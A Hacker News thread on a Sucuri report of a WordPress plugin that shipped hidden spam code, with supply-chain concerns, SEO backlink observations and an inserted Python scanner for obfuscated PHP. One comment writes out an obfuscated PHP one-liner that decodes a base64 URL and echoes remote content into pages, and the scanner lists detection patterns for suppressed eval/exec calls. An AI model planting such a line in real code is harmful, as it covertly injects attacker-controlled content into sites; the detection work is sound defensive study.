

WordPress Plugin Social Media Widget Hiding Spam - sucuri2
http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html

======
joshguthrie
For a "hidden" payload, it looks awfully complicated and long. This could've
been accomplished with a simple one-liner that would've been easier to hide:

    echo @file_get_contents(base64_decode("aHR0cDovL2kuYWF1ci5uZXQvaS5waHA="));

Plus it may have looked like "black magic" to someone not acquainted with
@-prefixed functions in PHP and base64 =)

> It's the fact that the malicious payload found its way in the core files.
> It was then uploaded to the WordPress.org Plugin Repository.

I second this fear. Many of us would be quick to dismiss this issue (Call me
biased, but I don't see this gaining as much "traction" as the crisis we had
when RubyGems was compromised) because "PHP is bad and you should feel bad" or
"WordPress users can't code", but this is not "a repository is being hacked",
this is "a plugin with malicious code has been uploaded ready to be used".
This is exactly the same as an npm module handling payments gaining a 20-line
payload sending critical info to parts unknown when bumping from 1.0.1 to
1.0.2: a plugin developer pushed corrupt code to be used in production (though
there is nothing about it, I hope this happened without malice on this
person's behalf).

This makes me seriously wonder: how many of us ACTUALLY "dive" into the
libraries we use day-to-day in production apps? How many of us read every part
of these libraries when we don't need to understand/debug them?

The last time you used Boost Threads, did you read (and understand) their
source code? What about Express or Mongoose in your Node.js-powered e-commerce
web app? Or your RoR app using Mongoid?

Waiting for input, opinions, advice, best practices and the like.

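A defender's-side counterpart to the one-liner quoted above: an added example (not from the post or from Sucuri) that scans PHP source for the two idioms the comment names, error-suppressed I/O calls and string literals hidden behind base64_decode(), and decodes the literal so a reviewer can see where a plugin phones home. The sample plugin text and the example.invalid URL are constructed for illustration.

```python
import base64
import re

# Obfuscation idioms from the comment: `@` error suppression on I/O or
# execution calls, and a URL tucked inside a base64_decode() literal.
SUPPRESSED_CALL = re.compile(
    r"@\s*(file_get_contents|eval|include|require|curl_exec|system|exec)\s*\(")
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*\)")


def decode_b64(literal):
    """Decode a base64 literal; return text only if it is printable ASCII."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_php_source(src):
    """Return one finding per suspicious line: (line_no, reason, decoded_or_None)."""
    findings = []
    for no, line in enumerate(src.splitlines(), start=1):
        lit = B64_LITERAL.search(line)
        decoded = decode_b64(lit.group(1)) if lit else None
        call = SUPPRESSED_CALL.search(line)
        if decoded and decoded.lower().startswith(("http://", "https://")):
            findings.append((no, "base64-hidden URL", decoded))
        elif call and lit:
            findings.append((no, "suppressed call with base64 argument", decoded))
        elif call:
            findings.append((no, "error-suppressed %s()" % call.group(1), None))
    return findings


# Constructed sample plugin: one benign base64 literal (an inline image), one
# plain local read, and the commenter's one-liner pointing at a placeholder host.
HIDDEN = base64.b64encode(b"http://example.invalid/i.php").decode()
ICON = base64.b64encode(b"GIF89a\x01\x00").decode()
SAMPLE_PLUGIN = f"""<?php
/* Plugin Name: Example Widget (constructed sample, not the real plugin) */
$title = get_option('smw_title');
$icon = base64_decode('{ICON}'); // inline image, benign
echo @file_get_contents(base64_decode("{HIDDEN}"));
$cfg = file_get_contents(__DIR__ . '/settings.json');
"""

if __name__ == "__main__":
    for no, reason, decoded in scan_php_source(SAMPLE_PLUGIN):
        print(f"line {no}: {reason}" + (f" -> {decoded}" if decoded else ""))
```

Only the line combining the suppressed call with a decodable URL is reported; the image literal and the local config read pass, which is the signal-to-noise a plugin reviewer needs before reading every line by hand.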
------
trevin
Some sophisticated SEO link spam for 'pay day loans'

Out of curiosity, I looked up that particular pay day loan site's backlink
profile. They went from having zero websites linking to them to around 250,000
in the matter of a few hours. All of the links had anchor text with some
variation of 'payday loans' or 'payday loans UK'.

Here's a screenshot of their backlink increase:
<http://i.imgur.com/Qo20DkL.png>

Doesn't look like they are ranking on page 1 yet for any of those terms, which
is good. Hopefully Google is on to them.

~~~
mpclark
What's the tool you used to get the backlink profile?

~~~
trevin
<https://ahrefs.com/>

------
rumble_king1
You can read the original plugin author's response here:
[http://wordpress.org/support/topic/plugin-social-media-widge...](http://wordpress.org/support/topic/plugin-social-media-widget-php-notice-undefined-index-pinterest-on-line-66)

------
pgrote
It has been removed from wordpress.org. The support page is working, though:

<http://wordpress.org/support/plugin/social-media-widget>

~~~
sucuri2
Yep. The WP.org guys explain the reason for removing it:

[http://wordpress.org/support/topic/anyone-know-why-social-me...](http://wordpress.org/support/topic/anyone-know-why-social-media-widget-was-removed)

